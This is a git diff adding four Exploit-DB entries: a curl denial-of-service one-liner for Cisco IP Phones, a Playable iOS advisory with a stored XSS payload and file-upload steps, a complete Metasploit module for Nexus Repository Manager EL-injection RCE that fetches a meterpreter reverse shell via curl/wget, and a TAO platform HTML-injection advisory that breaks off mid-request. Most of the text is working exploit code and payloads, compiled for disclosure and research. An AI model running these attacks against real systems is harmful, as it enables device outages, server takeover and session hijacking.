diff --git a/exploits/hardware/webapps/48342.txt b/exploits/hardware/webapps/48342.txt
new file mode 100644
index 000000000..b143e957d
--- /dev/null
+++ b/exploits/hardware/webapps/48342.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Cisco IP Phone 11.7 - Denial of Service (PoC)
+# Date: 2020-04-15
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://www.cisco.com
+# Software Link: https://www.cisco.com/c/en/us/products/collaboration-endpoints/ip-phones/index.html
+# Version: Before 11.7(1)
+# Tested on: Cisco Wireless IP Phone 8821
+# CVE: CVE-2020-3161
+# Cisco Advisory: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs
+# Researcher Advisory: https://www.tenable.com/security/research/tra-2020-24
+
+curl -v --path-as-is --insecure
+https://phone_address/deviceconfig/setActivationCode?params=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
\ No newline at end of file
diff --git a/exploits/ios/webapps/48340.txt b/exploits/ios/webapps/48340.txt
new file mode 100644
index 000000000..2960d2761
--- /dev/null
+++ b/exploits/ios/webapps/48340.txt
@@ -0,0 +1,423 @@
+# Title: Playable 9.18 iOS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Software Link: https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
+# CVE: N/A
+
+Document Title:
+===============
+Playable v9.18 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2198
+
+
+Release Date:
+=============
+2020-04-16
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2198
+
+
+Common Vulnerability Scoring System:
+====================================
+7.3
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Watch your MKV, MP4 and MOV movie files on your iPad, iPhone or iPod
+Touch without conversion -
+just copy files to your device through iTunes or over Wifi!  To search
+for closed captions /
+subtitles select a video then press the magnifying glass icon to the top
+right of the video.
+
+(Copy of the Homepage:
+https://apps.apple.com/de/app/playable-the-full-hd-media-player/id502405034
+)
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+vulnerabilities in the official Playable v9.18 apple ios mobile application.
+
+
+Affected Product(s):
+====================
+Portable Ltd
+Product: Playable v9.18 - iOS Mobile Web Application
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-16: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Pre auth - no privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+1.1
+A persistent script code injection web vulnerability has been discovered
+in the official Playable v9.18 apple ios mobile application.
+The vulnerability allows remote attackers to inject own malicious
+persistent script codes to the application-side for manipulation.
+
+The vulnerability is located in the filename parameter of the upload
+module. Attackers with wifi access are able to perform uploads
+with malicious script code to manipulation the mobile application ui.
+The request method to inject is POST and the attack vector of
+the vulnerability is persistent. Attackers are able to inject html and
+javascript codes to comrpomise the mobile wifi web-application.
+The injection point is the upload form on localhost:8881 and the
+execution occurs on localhost:80 with the visible ui listing.
+
+Successful exploitation of the vulnerability results in session
+hijacking, persistent phishing attacks, persistent external redirects
+to malicious source and persistent manipulation of affected mobile
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Function(s):
+[+] upload
+
+Vulnerable Parameter(s):
+[+] filename
+
+
+1.2
+An arbitrary file upload web vulnerability has been discovered in the
+official Playable v9.18 apple ios mobile application.
+The arbitary file upload vulnerability allows remote attackers to upload
+malicious files to compromise the mobile application.
+
+The vulnerability is located in the filename parameter of the upload
+module. Attackers with wifi access are able to perform
+uploads with malicious file extions to bypass the parse function. In a
+second step the attacker requests the local file to
+execute the malicious content on the local web-server. The request
+method to inject is POST and the attack vector of the
+vulnerability is located on the application-side. The injection point is
+the upload form on localhost:8881. The execution
+point becomes visible by a request the localhost:80/vid/[filename] path
+with the uploaded file content. The is present
+because of a missing file parse and insecure upload handling on file
+extensions. As well the local web-server can be
+reconfigured to provide more security on user interactions.
+
+Successful exploitation of the arbitrary file upload vulnerability
+results in a compromise of the local ios mobile application.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Function(s):
+[+] upload
+
+Vulnerable Parameter(s):
+[+] filename
+
+Affected Module(s):
+[+] /vid/
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The persistent script code injection vulnerability can be exploited by
+remote attackers with wifi network access without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Install the ios application
+(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
+2. Start the ios application on your local ios device
+3. Start the wifi share service in the application ui
+4. Open the web-browser
+5. Tamper the http requests
+6. Prepare to upload any file and press the upload button
+7. Inject as filename any html/js script code payload
+8. Continue to transmit the POST method request
+9. The file executes on the index listing on port 8881
+(http://localhost:8881/index.html)
+10. Successful reproduce of the persistent script code injection web
+vulnerability!
+
+
+PoC: Exploitation
+>"<iframe src=evil.source onload=alert(document.domain)>.jpg
+
+
+--- PoC Session logs [POST] ---
+Status: 200[OK]
+POST http://localhost:8881/upload
+Mime Type[text/html]
+   Request Header:
+      Host[localhost:8881]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+      Accept[*/*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8881/index.html]
+      Content-Length[8559]
+      Content-Type[multipart/form-data;
+boundary=---------------------------3823323145734]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------3823323145734
+Content-Disposition: form-data; name="file"; filename=">"<iframe
+src=evil.source onload=alert(document.domain)>.jpg"
+-
+Status: 200[OK]
+GET http://localhost/evil.source
+Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost/evil.source]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Connection[keep-alive]
+      Upgrade-Insecure-Requests[1]
+      Cache-Control[max-age=0]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[8559]
+
+
+
+1.2
+the arbitrary file upload vulnerability can be exploited by local
+attackers with wifi network access without user interaction.
+For security demonstration or to reproduce the vulnerability follow the
+provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Install the ios application
+(https://apps.apple.com/us/app/playable-the-full-hd-media-player/id502405034)
+2. Start the ios application on your local ios device
+3. Start the wifi share service in the application ui
+4. Open the web-browser
+5. Tamper the http requests
+6. Prepare a js file with malicious test content
+7. Extend the file name with .jpg
+Note: The upload mechanism does not parse or checks for multiple
+extensions on file uploads
+8. Upload the file by pushing the Upload File button
+9. Open the url in the default /vid/ folder and remove the .jpg extension
+10. The simple js executes in the scripting engine when opening
+11. Successful reproduce of the arbitrary file upload vulnerability!
+Note: Using the ftp you can perform to create the file via console
+ftp://localhost (read/write permissions)
+
+
+PoC: Exploitation
+http://localhost/vid/clay.js.jpg
+
+
+--- PoC Session logs [POST] ---
+Status: 200[OK]
+POST http://localhost:8881/upload
+Mime Type[text/html]
+   Request Header:
+      Host[localhost:8881]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+      Accept[*/*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost:8881/index.html]
+      Content-Length[86856]
+      Content-Type[multipart/form-data;
+boundary=---------------------------3823323145733]
+      Connection[keep-alive]
+   POST-Daten:
+      POST_DATA[-----------------------------3823323145733
+Content-Disposition: form-data; name="file"; filename="clay.js.jpg"
+-
+Status: 200[OK]
+GET http://localhost/listVideosJson
+Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+      Accept[application/json, text/javascript, */*; q=0.01]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      Referer[http://localhost/]
+      Connection[keep-alive]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[87]
+-
+Status: 200[OK]
+GET http://localhost/vid/clay.js.jpg
+Mime Type[application/iosjpg]
+   Request Header:
+      Host[localhost]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://localhost/]
+      Connection[keep-alive]
+      Upgrade-Insecure-Requests[1]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[86670]
+      Content-Type[application/iosjpg;]
+-
+Status: 200[OK]
+GET http://localhost/vid/clay.js
+Mime Type[application/x-unknown-content-type]
+   Request Header:
+      Host[localhost]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0)
+Gecko/20100101 Firefox/52.0]
+
+Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Connection[keep-alive]
+      Upgrade-Insecure-Requests[1]
+   Response Header:
+      Accept-Ranges[bytes]
+      Content-Length[0]
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The vulnerability can be resolved by a restriction and parse of the
+filename parameter. Disallow special chars and restrict inputs.
+Encode also the output locations to ensure nobody is able to execute
+script code in the main file listing.
+
+1.2
+Parse the filename for multiple extensions and prevent that attackers
+open specific dangerous file extensions that could
+compromise the local application path.
+
+
+Security Risk:
+==============
+1.1
+The security risk of the script code injection web vulnerability in the
+mobile ios application is estimated as high.
+
+1.2
+The security risk of the arbitrary file upload vulnerability in the
+mobile ios application is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability-Lab -
+https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
+Benjamin Kunz Mejri -
+https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com		www.vuln-lab.com			
+www.vulnerability-db.com
+Services:   magazine.vulnerability-lab.com
+paste.vulnerability-db.com 			infosec.vulnerability-db.com
+Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 		
+youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+				    Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/linux/remote/48343.rb b/exploits/linux/remote/48343.rb
new file mode 100755
index 000000000..13456ea0f
--- /dev/null
+++ b/exploits/linux/remote/48343.rb
@@ -0,0 +1,196 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'Nexus Repository Manager Java EL Injection RCE',
+      'Description'     => %q{
+        This module exploits a Java Expression Language (EL) injection in Nexus
+        Repository Manager versions up to and including 3.21.1 to execute code
+        as the Nexus user.
+
+        This is a post-authentication vulnerability, so credentials are required
+        to exploit the bug. Any user regardless of privilege level may be used.
+
+        Tested against 3.21.1-01.
+      },
+      'Author'          => [
+        'Alvaro Muñoz', # Discovery
+        'wvu'           # Module
+      ],
+      'References'      => [
+        ['CVE', '2020-10199'],
+        ['URL', 'https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype'],
+        ['URL', 'https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31']
+      ],
+      'DisclosureDate'  => '2020-03-31', # Vendor advisory
+      'License'         => MSF_LICENSE,
+      'Platform'        => 'linux',
+      'Arch'            => [ARCH_X86, ARCH_X64],
+      'Privileged'      => false,
+      'Targets'         => [['Nexus Repository Manager <= 3.21.1', {}]],
+      'DefaultTarget'   => 0,
+      'DefaultOptions'  => {'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'},
+      'CmdStagerFlavor' => %i[curl wget],
+      'Notes'           => {
+        'Stability'     => [CRASH_SAFE],
+        'Reliability'   => [REPEATABLE_SESSION],
+        'SideEffects'   => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+      }
+    ))
+
+    register_options([
+      Opt::RPORT(8081),
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME',  [true, 'Nexus username', 'admin']),
+      OptString.new('PASSWORD',  [true, 'Nexus password'])
+    ])
+  end
+
+  def post_auth?
+    # Pre-auth RCE? https://twitter.com/iamnoooob/status/1246182773427240967
+    true
+  end
+
+  # Send a GET / request to the server, check the response for a Server header
+  # containing the Nexus version, and then check if it's a vulnerable version
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path)
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check request.')
+    end
+
+    unless res.headers['Server']
+      return CheckCode::Unknown('Target did not respond with Server header.')
+    end
+
+    # Example Server header:
+    # Server: Nexus/3.21.1-01 (OSS)
+    version = res.headers['Server'].scan(%r{^Nexus/([\d.-]+)}).flatten.first
+
+    unless version
+      return CheckCode::Unknown('Target did not respond with Nexus version.')
+    end
+
+    if Gem::Version.new(version) <= Gem::Version.new('3.21.1')
+      return CheckCode::Appears("Nexus #{version} is a vulnerable version.")
+    end
+
+    CheckCode::Safe("Nexus #{version} is NOT a vulnerable version.")
+  end
+
+  def exploit
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    print_status("Executing command stager for #{datastore['PAYLOAD']}")
+
+    # This will drop a binary payload to disk and execute it!
+    execute_cmdstager(
+      noconcat: true,
+      cookie:   login(datastore['USERNAME'], datastore['PASSWORD'])
+    )
+  end
+
+  def login(username, password)
+    print_status("Logging in with #{username}:#{password}")
+
+    res = send_request_cgi({
+      'method'     => 'POST',
+      'uri'        => normalize_uri(target_uri.path,
+                                    '/service/rapture/session'),
+      'vars_post'  => {
+        'username' => Rex::Text.encode_base64(username),
+        'password' => Rex::Text.encode_base64(password)
+      },
+      'partial'    => true # XXX: Return partial response despite timeout
+    }, 3.5)
+
+    unless res
+      fail_with(Failure::Unknown, 'Target did not respond to login request')
+    end
+
+    cookie = res.get_cookies
+
+    unless res.code == 204 && cookie.match(/NXSESSIONID=[\h-]+/)
+      fail_with(Failure::NoAccess, 'Could not log in with specified creds')
+    end
+
+    print_good("Logged in with #{cookie}")
+    cookie
+  end
+
+  # This is defined so that CmdStager can use it!
+  def execute_command(cmd, opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path,
+                                '/service/rest/beta/repositories/go/group'),
+      # HACK: Bypass CSRF token with random User-Agent header
+      'agent'  => rand_text_english(8..42),
+      'cookie' => opts[:cookie],
+      'ctype'  => 'application/json',
+      'data'   => json_payload(cmd)
+    )
+
+    unless res
+      fail_with(Failure::Unknown, 'Target did not respond to payload request')
+    end
+
+    unless res.code == 400 && res.body.match(/java\.lang\.UNIXProcess@\h+/)
+      fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
+    end
+
+    print_good("Successfully executed command: #{cmd}")
+  end
+
+  # PoC based off API docs for /service/rest/beta/repositories/go/group:
+  # http://localhost:8081/#admin/system/api
+  def json_payload(cmd)
+    {
+      'name'                          => 'internal',
+      'online'                        => true,
+      'storage'                       => {
+        'blobStoreName'               => 'default',
+        'strictContentTypeValidation' => true
+      },
+      'group'                         => {
+        # XXX: memberNames has to be an array, but the API example was a string
+        'memberNames'                 => [el_payload(cmd)]
+      }
+    }.to_json
+  end
+
+  # Helpful resource from which I borrowed the EL payload:
+  # https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
+  def el_payload(cmd)
+    # HACK: Format our EL expression nicely and then strip introduced whitespace
+    el = <<~EOF.gsub(/\s+/, '')
+      ${
+        "".getClass().forName("java.lang.Runtime").getMethods()[6].invoke(
+          "".getClass().forName("java.lang.Runtime")
+        ).exec("PATCH_ME")
+      }
+    EOF
+
+    # Patch in our command, escaping any double quotes
+    el.sub('PATCH_ME', cmd.gsub('"', '\\"'))
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/php/webapps/48341.txt b/exploits/php/webapps/48341.txt
new file mode 100644
index 000000000..f95c24a2d
--- /dev/null
+++ b/exploits/php/webapps/48341.txt
@@ -0,0 +1,433 @@
+# Title: TAO Open Source Assessment Platform 3.3.0 RC02 - HTML Injection
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: https://www.taotesting.com
+# Software Link: https://www.taotesting.com/product/
+# CVE: N/A
+
+Document Title:
+===============
+TAO Open Source Assessment Platform v3.3.0 RC02 - Multiple Web
+Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2215
+
+
+Release Date:
+=============
+2020-04-16
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2215
+
+
+Common Vulnerability Scoring System:
+====================================
+4
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+Accelerating innovation in digital assessment. The TAO assessment
+platform gives you the freedom, control, and
+support to evolve with today's learners. For organizations who want the
+freedom to control their assessment
+software – from authoring to delivery to reporting.
+
+(Copy of the Homepage: https://www.taotesting.com/product/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple
+cross site vulnerabilities in the TAO Open Source Assessment Platform
+v3.3.0 RC02.
+
+
+Affected Product(s):
+====================
+Product: TAO Open Source Assessment Platform v3.3.0 RC02
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-16: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+1.1
+A html injection web vulnerability has been discovered in the TAO Open
+Source Assessment Platform v3.3.0 RC02 web-application.
+The vulnerability allows remote attackers to inject own malicious html
+codes with persistent attack vector to compromise browser
+to web-application requests from the application-side.
+
+The html inject web vulnerability is located in the `userFirstName`,
+`userLastName`, `userMail`, `password2`, and `password3`
+parameters of the user account input field. The request method to inject
+is POST and the attack vector is application-side.
+Remote attackers are able to inject html code for the user account
+credentials to provoke an execution within the main manage
+user listing.
+
+Successful exploitation of the web vulnerability results in persistent
+phishing attacks, persistent external redirects to malicious
+source and persistent manipulation of affected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Manage Users
+
+Vulnerable Parameter(s):
+[+] userFirstName
+[+] userLastName
+[+] userMail
+[+] password2
+[+] password3
+
+
+
+1.2
+Multiple persistent cross site web vulnerabilities has been discovered
+in the TAO Open Source Assessment Platform v3.3.0 RC02.
+The vulnerability allows remote attackers to inject own malicious script
+codes with persistent attack vector to compromise browser to
+web-application requests from the application-side.
+
+The persistent vulnerability is located in the content parameter of the
+Rubric Block (Add) module. Attackers are able to inject own malicious
+script code inside of the rubric name value. The attached values will be
+redisplayed in the frontend of tao. The request method to inject is
+POST and the attack vector is located on the application-side. The
+injection point is the Rubric Block (Add) module and the execution occurs
+in the frontend panel when listing the item attribute.
+
+Successful exploitation of the web vulnerability results in session
+hijacking, persistent phishing attacks, persistent external redirects
+to malicious source and persistent manipulation of affected or connected
+application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Rubric Block (Add)
+
+Vulnerable Parameter(s):
+[+] content
+
+
+Proof of Concept (PoC):
+=======================
+1.1
+The persistent html injection web vulnerability can be exploited by
+remote attackers with privileged user account and low user interaction.
+For security demonstration or to reproduce the security web
+vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Install the application and open the ui
+2. Move on top right to the user button and click manage users
+3. Inject html script code payload into the vulnerable input fields
+4. Save the entry
+5. Open to the manage users listing
+Note: The payloads executes in the table that shows the user account
+values for admins
+6. Successful reproduce of the html inject vulnerability!
+
+
+PoC: Vulnerable Source (Manage Users)
+<th class="actions">Actions</th>
+</tr></thead>
+<tbody>
+<tr data-item-identifier="http_2_localhost_1_tao_0_rdf_3_i1586957152301539">
+<td class="login"><img
+src="https://www.evolution-sec.com/evosec-logo.png"></td>
+<td class="firstname"><img
+src="https://www.evolution-sec.com/evosec-logo.png"></td>
+<td class="lastname"><img
+src="https://www.evolution-sec.com/evosec-logo.png"></td>
+<td class="email"><img
+src="https://www.evolution-sec.com/evosec-logo.png"></td>
+<td class="roles">Test Taker</td>
+<td class="guiLg">German</td>
+<td class="status"><span class="icon-result-ok"></span> enabled</td>
+
+
+--- PoC Session Logs (POST) ---
+http://localhost:89/tao/Users/edit
+Host: localhost:89
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
+Gecko/20100101 Firefox/74.0
+Accept: text/html, */*; q=0.01
+Accept-Language: de,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 1393
+Origin: http://localhost:89
+Connection: keep-alive
+Referer:
+http://localhost:89/tao/Main/index?structure=users&ext=tao&section=edit_user
+Cookie: tao_GP8CPowQ=d6et7oifjip9jnkbc7pgeotsdj;
+tao_0855799=e0a3289004cc96a4ffba7bdcb8515d3665ccd004
+user_form_sent=1&tao.forms.instance=1&token=e0a3289004cc96a4ffba7bdcb8515d3665ccd004&http_2_www_0_w3_0_org_1_2000_1_01_1_
+rdf-schema_3_label=<img
+src="https://www.evolution-sec.com/evosec-logo.png">&id=http://localhost/tao.rdf#i1586957152301539
+&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userFirstName=<img
+src="https://www.evolution-sec.com/evosec-logo.png">
+&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userLastName=<img
+src="https://www.evolution-sec.com/evosec-logo.png">
+&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userMail=<img
+src="https://www.evolution-sec.com/evosec-logo.png">&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userUILg=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langca&
